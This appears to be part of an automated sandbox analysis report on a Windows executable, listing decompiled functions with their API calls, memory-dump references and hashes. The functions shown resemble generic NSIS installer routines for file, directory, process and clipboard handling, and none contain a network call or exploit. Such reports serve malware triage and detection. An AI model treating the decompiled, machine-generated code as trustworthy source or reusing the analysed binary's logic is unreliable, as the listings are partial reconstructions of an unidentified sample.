                                                                            Function 00406008, Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E00406008(WCHAR* _a4) {
				signed char _t3;
				signed char _t7;

				_t3 = GetFileAttributesW(_a4); // executed
				_t7 = _t3;
				if(_t7 != 0xffffffff) {
					SetFileAttributesW(_a4, _t3 & 0x000000fe);
				}
				return _t7;
			}





                                                                            0x0040600d
                                                                            0x00406013
                                                                            0x00406018
                                                                            0x00406021
                                                                            0x00406021
                                                                            0x0040602a

                                                                            APIs
                                                                            • GetFileAttributesW.KERNELBASE(?,?,00405C0D,?,?,00000000,00405DE3,?,?,?,?), ref: 0040600D
                                                                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 00406021
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.416752440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.416746515.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416777900.0000000000408000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416787128.000000000040A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416790388.000000000040D000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416802899.0000000000415000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416806904.000000000041B000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416819547.0000000000427000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416828805.0000000000431000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416833296.0000000000442000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416840722.000000000044C000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID: AttributesFile
                                                                            • String ID:
                                                                            • API String ID: 3188754299-0
                                                                            • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                                            • Instruction ID: c979a2e86073268fb5c10017c0603d576bb262e7e1663e1e1b2ee048d1a5e24b
                                                                            • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                                            • Instruction Fuzzy Hash: 34D012725041316FC2102728EF0C89BBF55EF643717014B35F9A5A22F0CB304C638A98
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00405AEB, Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E00405AEB(WCHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryW(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}




                                                                            0x00405af1
                                                                            0x00405af9
                                                                            0x00000000
                                                                            0x00405aff
                                                                            0x00000000

                                                                            APIs
                                                                            • CreateDirectoryW.KERNELBASE(?,00000000,00403520,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405AF1
                                                                            • GetLastError.KERNEL32 ref: 00405AFF
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.416752440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.416746515.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416777900.0000000000408000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416787128.000000000040A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416790388.000000000040D000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416802899.0000000000415000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416806904.000000000041B000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416819547.0000000000427000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416828805.0000000000431000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416833296.0000000000442000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416840722.000000000044C000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID: CreateDirectoryErrorLast
                                                                            • String ID:
                                                                            • API String ID: 1375471231-0
                                                                            • Opcode ID: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                                                                            • Instruction ID: 33feed20cbbf131019f18849f7ccc9358209a8d33535326e0157453b6049084a
                                                                            • Opcode Fuzzy Hash: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                                                                            • Instruction Fuzzy Hash: 1BC04C30204501AED6105B609E48B177AA4DB50741F16843D6146E41E0DA789455EE2D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004060DF, Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E004060DF(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                                                                            0x004060e3
                                                                            0x004060f3
                                                                            0x004060fb
                                                                            0x00000000
                                                                            0x00406102
                                                                            0x00000000
                                                                            0x00406104

                                                                            APIs
                                                                            • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000), ref: 004060F3
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.416752440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.416746515.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416777900.0000000000408000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416787128.000000000040A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416790388.000000000040D000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416802899.0000000000415000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416806904.000000000041B000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416819547.0000000000427000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416828805.0000000000431000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416833296.0000000000442000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416840722.000000000044C000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID: FileWrite
                                                                            • String ID:
                                                                            • API String ID: 3934441357-0
                                                                            • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                            • Instruction ID: d8d859634201a592f38c73999a999f352708a9e59580de02994c407fa40ca669
                                                                            • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                            • Instruction Fuzzy Hash: FAE08C3220026AABEF109E60DC04AEB3B6CFB00360F014837FA16E7081E270E93087A4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004060B0, Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E004060B0(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                                                                            0x004060b4
                                                                            0x004060c4
                                                                            0x004060cc
                                                                            0x00000000
                                                                            0x004060d3
                                                                            0x00000000
                                                                            0x004060d5

                                                                            APIs
                                                                            • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000), ref: 004060C4
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.416752440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.416746515.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416777900.0000000000408000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416787128.000000000040A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416790388.000000000040D000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416802899.0000000000415000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416806904.000000000041B000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416819547.0000000000427000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416828805.0000000000431000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416833296.0000000000442000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416840722.000000000044C000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID: FileRead
                                                                            • String ID:
                                                                            • API String ID: 2738559852-0
                                                                            • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                                            • Instruction ID: 1583d2e05e1cff28e3594e7db3f0db2d88eef65457287744bb544c492d9958e5
                                                                            • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                                            • Instruction Fuzzy Hash: AEE0EC322502AAABDF10AE65DC04AEB7B6CEB05361F018936FD16E6150E631E92197A4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004034E5, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E004034E5(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
				return _t2;
			}




                                                                            0x004034f3
                                                                            0x004034f9

                                                                            APIs
                                                                            • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403242,?,?,?,?,?,?,0040387D,?), ref: 004034F3
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.416752440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.416746515.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416777900.0000000000408000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416787128.000000000040A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416790388.000000000040D000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416802899.0000000000415000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416806904.000000000041B000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416819547.0000000000427000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416828805.0000000000431000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416833296.0000000000442000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416840722.000000000044C000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID: FilePointer
                                                                            • String ID:
                                                                            • API String ID: 973152223-0
                                                                            • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                                            • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
                                                                            • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                                            • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00401FA4, Relevance: 1.3, APIs: 1, Instructions: 37COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 78%
                                                                            			E00401FA4(void* __ecx) {
				void* _t9;
				intOrPtr _t13;
				void* _t15;
				void* _t17;
				void* _t20;
				void* _t22;

				_t17 = __ecx;
				_t19 = E00402DA6(_t15);
				E0040559F(0xffffffeb, _t7);
				_t9 = E00405B20(_t19); // executed
				_t20 = _t9;
				if(_t20 == _t15) {
					 *((intOrPtr*)(_t22 - 4)) = 1;
				} else {
					if( *((intOrPtr*)(_t22 - 0x28)) != _t15) {
						_t13 = E004069B5(_t17, _t20);
						if( *((intOrPtr*)(_t22 - 0x2c)) < _t15) {
							if(_t13 != _t15) {
								 *((intOrPtr*)(_t22 - 4)) = 1;
							}
						} else {
							E00406484( *((intOrPtr*)(_t22 - 0xc)), _t13);
						}
					}
					_push(_t20);
					CloseHandle();
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t22 - 4));
				return 0;
			}









                                                                            0x00401fa4
                                                                            0x00401faa
                                                                            0x00401faf
                                                                            0x00401fb5
                                                                            0x00401fba
                                                                            0x00401fbe
                                                                            0x0040292e
                                                                            0x00401fc4
                                                                            0x00401fc7
                                                                            0x00401fca
                                                                            0x00401fd2
                                                                            0x00401fe1
                                                                            0x00401fe3
                                                                            0x00401fe3
                                                                            0x00401fd4
                                                                            0x00401fd8
                                                                            0x00401fd8
                                                                            0x00401fd2
                                                                            0x00401fea
                                                                            0x00401feb
                                                                            0x00401feb
                                                                            0x00402c2d
                                                                            0x00402c39

                                                                            APIs
                                                                              • Part of subcall function 0040559F: lstrlenW.KERNEL32(0042C248,00000000,?,74EC110C,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
                                                                              • Part of subcall function 0040559F: lstrlenW.KERNEL32(00403418,0042C248,00000000,?,74EC110C,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
                                                                              • Part of subcall function 0040559F: lstrcatW.KERNEL32 ref: 004055FA
                                                                              • Part of subcall function 0040559F: SetWindowTextW.USER32 ref: 0040560C
                                                                              • Part of subcall function 0040559F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
                                                                              • Part of subcall function 0040559F: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
                                                                              • Part of subcall function 0040559F: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A
                                                                              • Part of subcall function 00405B20: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430270,00000000), ref: 00405B49
                                                                              • Part of subcall function 00405B20: CloseHandle.KERNEL32(?), ref: 00405B56
                                                                            • CloseHandle.KERNEL32(?), ref: 00401FEB
                                                                              • Part of subcall function 004069B5: WaitForSingleObject.KERNEL32(?,00000064), ref: 004069C6
                                                                              • Part of subcall function 004069B5: GetExitCodeProcess.KERNEL32(?,?), ref: 004069E8
                                                                              • Part of subcall function 00406484: wsprintfW.USER32 ref: 00406491
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.416752440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.416746515.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416777900.0000000000408000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416787128.000000000040A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416790388.000000000040D000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416802899.0000000000415000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416806904.000000000041B000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416819547.0000000000427000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416828805.0000000000431000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416833296.0000000000442000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416840722.000000000044C000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                                            • String ID:
                                                                            • API String ID: 2972824698-0
                                                                            • Opcode ID: e5695736b62b43c8ae89a662f08ea5f60bb9f5769fc6117d503f1a8a6a447ea4
                                                                            • Instruction ID: a015d294fcb9cc4e365613bb9e09bf6e78b00889af70ee47f703a6c6056ea9c8
                                                                            • Opcode Fuzzy Hash: e5695736b62b43c8ae89a662f08ea5f60bb9f5769fc6117d503f1a8a6a447ea4
                                                                            • Instruction Fuzzy Hash: 2DF09072904112EBCB21BBA59A84EDE76E8DF01318F25403BE102B21D1D77C4E429A6E
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00403B12, Relevance: 1.3, APIs: 1, Instructions: 11COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E00403B12() {
				void* _t1;
				signed int _t6;

				_t1 =  *0x40a018; // 0xffffffff
				if(_t1 != 0xffffffff) {
					CloseHandle(_t1);
					 *0x40a018 =  *0x40a018 | 0xffffffff;
					_t6 =  *0x40a018;
				}
				E00403B57();
				return E00405C49(_t6, 0x443000, 7);
			}





                                                                            0x00403b12
                                                                            0x00403b1a
                                                                            0x00403b1d
                                                                            0x00403b23
                                                                            0x00403b23
                                                                            0x00403b23
                                                                            0x00403b2a
                                                                            0x00403b3b

                                                                            APIs
                                                                            • CloseHandle.KERNEL32(FFFFFFFF), ref: 00403B1D
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.416752440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.416746515.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416777900.0000000000408000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416787128.000000000040A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416790388.000000000040D000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416802899.0000000000415000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416806904.000000000041B000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416819547.0000000000427000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416828805.0000000000431000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416833296.0000000000442000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416840722.000000000044C000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID: CloseHandle
                                                                            • String ID:
                                                                            • API String ID: 2962429428-0
                                                                            • Opcode ID: 9cd88207fd683789c603ed0f4e7699fa10f469d988cc37cfea850538d3727966
                                                                            • Instruction ID: 74b342ff74dc5917d60848dc34610585f5de2c5243f802b65b47dd8438b48b4d
                                                                            • Opcode Fuzzy Hash: 9cd88207fd683789c603ed0f4e7699fa10f469d988cc37cfea850538d3727966
                                                                            • Instruction Fuzzy Hash: 5EC0123050470056D1646F749E4FE153B64AB4073EB600325B0F9B10F1CB3C5759895D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Non-executed Functions

                                                                            Function 004056DE, Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284windowclipboardmemoryCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 95%
                                                                            			E004056DE(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t94;
				long _t95;
				int _t100;
				void* _t108;
				intOrPtr _t130;
				struct HWND__* _t134;
				int _t156;
				int _t159;
				struct HMENU__* _t164;
				struct HWND__* _t168;
				struct HWND__* _t169;
				int _t171;
				void* _t172;
				short* _t173;
				short* _t175;
				int _t177;

				_t169 =  *0x433ee4;
				_t156 = 0;
				_v8 = _t169;
				if(_a8 != 0x110) {
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E00405672, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
					}
					if(_a8 != 0x111) {
						L17:
						_t171 = 1;
						if(_a8 != 0x404) {
							L25:
							if(_a8 != 0x7b) {
								goto L20;
							}
							_t94 = _v8;
							if(_a12 != _t94) {
								goto L20;
							}
							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
							_a8 = _t95;
							if(_t95 <= _t156) {
								L36:
								return 0;
							}
							_t164 = CreatePopupMenu();
							AppendMenuW(_t164, _t156, _t171, E0040657A(_t156, _t164, _t171, _t156, 0xffffffe1));
							_t100 = _a16;
							_t159 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v28);
								_t100 = _v28.left;
								_t159 = _v28.top;
							}
							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
								_v60 = _t156;
								_v48 = 0x42d268;
								_v44 = 0x1000;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
								} while (_a4 != _t156);
								OpenClipboard(_t156);
								EmptyClipboard();
								_t108 = GlobalAlloc(0x42, _t171 + _t171);
								_a4 = _t108;
								_t172 = GlobalLock(_t108);
								do {
									_v48 = _t172;
									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
									 *_t173 = 0xd;
									_t175 = _t173 + 2;
									 *_t175 = 0xa;
									_t172 = _t175 + 2;
									_t156 = _t156 + 1;
								} while (_t156 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(0xd, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						if( *0x433ecc == _t156) {
							ShowWindow( *0x434f08, 8);
							if( *0x434f8c == _t156) {
								E0040559F( *((intOrPtr*)( *0x42c240 + 0x34)), _t156);
							}
							E00404472(_t171);
							goto L25;
						}
						 *0x42ba38 = 2;
						E00404472(0x78);
						goto L20;
					} else {
						if(_a12 != 0x403) {
							L20:
							return E00404500(_a8, _a12, _a16);
						}
						ShowWindow( *0x433ed0, _t156);
						ShowWindow(_t169, 8);
						E004044CE(_t169);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_t177 = 2;
				_v60 = _t177;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t130 =  *0x434f10;
				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
				_a12 =  *((intOrPtr*)(_t130 + 0x60));
				 *0x433ed0 = GetDlgItem(_a4, 0x403);
				 *0x433ec8 = GetDlgItem(_a4, 0x3ee);
				_t134 = GetDlgItem(_a4, 0x3f8);
				 *0x433ee4 = _t134;
				_v8 = _t134;
				E004044CE( *0x433ed0);
				 *0x433ed4 = E00404E27(4);
				 *0x433eec = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(_t177);
				SendMessageW(_v8, 0x1061, 0,  &_v60);
				SendMessageW(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageW(_v8, 0x1001, 0, _a8);
					SendMessageW(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t156) {
					SendMessageW(_v8, 0x1024, _t156, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00404499(_a4);
				if(( *0x434f18 & 0x00000003) != 0) {
					ShowWindow( *0x433ed0, _t156);
					if(( *0x434f18 & 0x00000002) != 0) {
						 *0x433ed0 = _t156;
					} else {
						ShowWindow(_v8, 8);
					}
					E004044CE( *0x433ec8);
				}
				_t168 = GetDlgItem(_a4, 0x3ec);
				SendMessageW(_t168, 0x401, _t156, 0x75300000);
				if(( *0x434f18 & 0x00000004) != 0) {
					SendMessageW(_t168, 0x409, _t156, _a12);
					SendMessageW(_t168, 0x2001, _t156, _a8);
				}
				goto L36;
			}

































                                                                            0x004056e6
                                                                            0x004056ec
                                                                            0x004056f6
                                                                            0x004056f9
                                                                            0x0040588f
                                                                            0x004058b3
                                                                            0x004058b3
                                                                            0x004058c6
                                                                            0x004058e4
                                                                            0x004058e6
                                                                            0x004058ee
                                                                            0x00405944
                                                                            0x00405948
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040594a
                                                                            0x00405950
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040595a
                                                                            0x00405962
                                                                            0x00405965
                                                                            0x00405a67
                                                                            0x00000000
                                                                            0x00405a67
                                                                            0x00405974
                                                                            0x0040597f
                                                                            0x00405988
                                                                            0x00405993
                                                                            0x00405996
                                                                            0x0040599f
                                                                            0x004059a5
                                                                            0x004059a8
                                                                            0x004059a8
                                                                            0x004059c0
                                                                            0x004059c9
                                                                            0x004059cc
                                                                            0x004059d3
                                                                            0x004059da
                                                                            0x004059e2
                                                                            0x004059e2
                                                                            0x004059f9
                                                                            0x004059f9
                                                                            0x00405a00
                                                                            0x00405a06
                                                                            0x00405a12
                                                                            0x00405a19
                                                                            0x00405a22
                                                                            0x00405a24
                                                                            0x00405a27
                                                                            0x00405a36
                                                                            0x00405a39
                                                                            0x00405a3f
                                                                            0x00405a40
                                                                            0x00405a46
                                                                            0x00405a47
                                                                            0x00405a48
                                                                            0x00405a50
                                                                            0x00405a5b
                                                                            0x00405a61
                                                                            0x00405a61
                                                                            0x00000000
                                                                            0x004059c0
                                                                            0x004058f6
                                                                            0x00405926
                                                                            0x0040592e
                                                                            0x00405939
                                                                            0x00405939
                                                                            0x0040593f
                                                                            0x00000000
                                                                            0x0040593f
                                                                            0x004058fa
                                                                            0x00405904
                                                                            0x00000000
                                                                            0x004058c8
                                                                            0x004058ce
                                                                            0x00405909
                                                                            0x00000000
                                                                            0x00405912
                                                                            0x004058d7
                                                                            0x004058dc
                                                                            0x004058df
                                                                            0x00000000
                                                                            0x004058df
                                                                            0x004058c6
                                                                            0x004056ff
                                                                            0x00405703
                                                                            0x0040570b
                                                                            0x0040570f
                                                                            0x00405712
                                                                            0x00405715
                                                                            0x00405718
                                                                            0x0040571b
                                                                            0x0040571c
                                                                            0x0040571d
                                                                            0x00405736
                                                                            0x00405739
                                                                            0x00405743
                                                                            0x00405752
                                                                            0x0040575a
                                                                            0x00405762
                                                                            0x00405767
                                                                            0x0040576a
                                                                            0x00405776
                                                                            0x0040577f
                                                                            0x00405788
                                                                            0x004057aa
                                                                            0x004057b0
                                                                            0x004057c1
                                                                            0x004057c6
                                                                            0x004057d4
                                                                            0x004057e2
                                                                            0x004057e2
                                                                            0x004057e7
                                                                            0x004057f5
                                                                            0x004057f5
                                                                            0x004057fa
                                                                            0x004057fd
                                                                            0x00405802
                                                                            0x0040580e
                                                                            0x00405817
                                                                            0x00405824
                                                                            0x00405833
                                                                            0x00405826
                                                                            0x0040582b
                                                                            0x0040582b
                                                                            0x0040583f
                                                                            0x0040583f
                                                                            0x00405853
                                                                            0x0040585c
                                                                            0x00405865
                                                                            0x00405875
                                                                            0x00405881
                                                                            0x00405881
                                                                            0x00000000

                                                                            APIs
                                                                            • GetDlgItem.USER32(?,00000403), ref: 0040573C
                                                                            • GetDlgItem.USER32(?,000003EE), ref: 0040574B
                                                                            • GetClientRect.USER32 ref: 00405788
                                                                            • GetSystemMetrics.USER32 ref: 0040578F
                                                                            • SendMessageW.USER32(?,00001061,00000000,?), ref: 004057B0
                                                                            • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057C1
                                                                            • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004057D4
                                                                            • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004057E2
                                                                            • SendMessageW.USER32(?,00001024,00000000,?), ref: 004057F5
                                                                            • ShowWindow.USER32(00000000,?), ref: 00405817
                                                                            • ShowWindow.USER32(?,00000008), ref: 0040582B
                                                                            • GetDlgItem.USER32(?,000003EC), ref: 0040584C
                                                                            • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040585C
                                                                            • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405875
                                                                            • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405881
                                                                            • GetDlgItem.USER32(?,000003F8), ref: 0040575A
                                                                              • Part of subcall function 004044CE: SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC
                                                                            • GetDlgItem.USER32(?,000003EC), ref: 0040589E
                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00005672,00000000), ref: 004058AC
                                                                            • CloseHandle.KERNEL32(00000000), ref: 004058B3
                                                                            • ShowWindow.USER32(00000000), ref: 004058D7
                                                                            • ShowWindow.USER32(?,00000008), ref: 004058DC
                                                                            • ShowWindow.USER32(00000008), ref: 00405926
                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040595A
                                                                            • CreatePopupMenu.USER32 ref: 0040596B
                                                                            • AppendMenuW.USER32 ref: 0040597F
                                                                            • GetWindowRect.USER32 ref: 0040599F
                                                                            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059B8
                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 004059F0
                                                                            • OpenClipboard.USER32(00000000), ref: 00405A00
                                                                            • EmptyClipboard.USER32 ref: 00405A06
                                                                            • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A12
